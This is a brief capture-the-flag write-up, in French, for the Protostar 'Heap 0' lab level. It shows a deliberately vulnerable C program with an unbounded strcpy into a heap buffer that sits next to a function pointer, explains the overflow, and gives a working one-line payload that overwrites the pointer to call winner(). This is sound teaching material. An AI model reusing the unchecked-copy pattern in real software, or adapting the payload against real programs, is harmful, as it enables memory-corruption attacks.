Heap 0

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
 
struct data {
	char name[64];
};
 
struct fp {
	int (*fp)();
};
 
void winner()
{
	printf("level passed\n");
}
 
void nowinner()
{
	printf("level has not been passed\n");
}
 
int main(int argc, char **argv)
{
	struct data *d;
	struct fp *f;
 
	d = malloc(sizeof(struct data));
	f = malloc(sizeof(struct fp));
	f->fp = nowinner;
 
	printf("data is at %p, fp is at %p\n", d, f);
 
	strcpy(d->name, argv[1]);
 
	f->fp();
 
}

Heap overflow basique, on va pouvoir écrire ce que l'on veut dans la variable fp de la structure fp. Cette variable contient l'adresse d'une fonction qui est appelée par la suite.

user@protostar:/opt/protostar/bin$ nm ./heap0 | grep winner
08048478 T nowinner
08048464 T winner
user@protostar:/opt/protostar/bin$ ./heap0 $(python -c 'print "A"*72+"\x64\x84\x04\x08"')
data is at 0x804a008, fp is at 0x804a050
level passed